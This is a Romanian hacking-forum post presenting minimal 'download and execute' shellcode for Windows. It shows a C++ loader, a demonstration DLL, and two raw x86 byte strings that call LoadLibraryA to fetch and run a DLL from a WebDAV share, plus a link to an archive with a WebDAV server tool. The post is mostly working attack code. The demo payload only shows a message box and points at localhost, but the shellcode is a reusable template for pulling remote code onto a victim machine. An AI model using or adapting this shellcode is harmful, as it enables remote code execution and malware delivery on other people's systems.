Jump to content
SlicK

Mini Download&Exec shellcode

By SlicK, in Programare

Recommended Posts

SlicK Newbie

SlicK

Posted
Posted

Mini Download&Exec shellcode

Autor: SlicK

Website: http://www.rstcenter.com/

Aceasta metoda de download si executie se bazeaza pe API'ul windows LoadLibrary().

Acesta primeste ca parametru calea unui fisier(dll sau executabil) si il mapeaza in memorie.

In cazul in care fisierul este un dll, functia entry point a acestuia este apelata cu parametrul "DLL_PROCESS_ATTACH".

Un fapt mai putin cunoscut despre acest API este ca poate de asemenea sa incarce fisiere aflate pe servere WebDAV.

WebDAV este o extensie a protocolului http care foloseste requesturi asemanatoare care insa nu pot fi tratate de un

server http obisnuit fara extensiile corespunzatoare.

Pentru a incarca un fisier prin intermediul WebDAV, LoadLibrary este apelat astfel: LoadLibrary("\\SERVER\FISIER") sau in C++: LoadLibray("\\\\SERVER\\FISIER");

Exemplu C++ (loader.cpp)


#include <windows.h>
int main()
{
  LoadLibrary("\\\\127.0.0.1\\x.dll");
  return(0);
}

Acum avem nevoie si de un dll care sa fie incarcat si rulat.

Exemplu C++ (payload.cpp)


#include <windows.h>
extern "C" BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpvReserved)
{
  if(dwReason==DLL_PROCESS_ATTACH)
  {
    MessageBox(NULL,"Dll injected successfully.","Injected",MB_OK|MB_ICONINFORMATION);
  }
  return TRUE;
}

Ca sa folosim acest dll pormin Mini WebDAV (il gasiti in arhiva) alegeti directorul unde se afla fisierul payload.dll si "Start Server", apoi rulati loader.exe

Daca totul a functionat cum trebuia ar trebui sa apara mesajul din dll ("Dll injected successfully");

Un exemplu de shellcode poate fi urmatorul (39 bytes):


char shellcode[]=
"\xE8\x18\x00\x00\x00" //call procedure
"\x5C\x5C\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31\x5C\x70\x61\x79\x6C\x6F\x61\x64\x2E\x64\x6C\x6C\x00" //db '\\127.0.0.1\payload.dll',0
"\xBB\x9C\x3F\x88\x7C" //mov  ebx,0x7C883F9C  ;LoadLibraryA
"\xFF\xD3"; //call ebx

Folosindu-ne de proprietatea API'ului de a adauga ".dll" la fisierele fara extensie putem micsora numele fisierului si deci a shellcodului pana la 26 de bytes:


char shellcode[]=
"\xE8\x0E\x00\x00\x00" //call procedure
"\x5C\x5C\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31\x5C\x78\x00" //db '\\127.0.0.1\x',0
"\xBB\x9C\x3F\x88\x7C" //mov  ebx,0x7C883F9C  ;LoadLibraryA
"\xFF\xD3"; //call ebx

Daca ip'ul ar fi de genul "1.1.1.1" ar aduce shellcodul la 24 de bytes fapt care il face cel mai mic shellcode de acest gen.

ARHIVA: http://rapidshare.com/files/97291649/Mini-D_E.rar.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...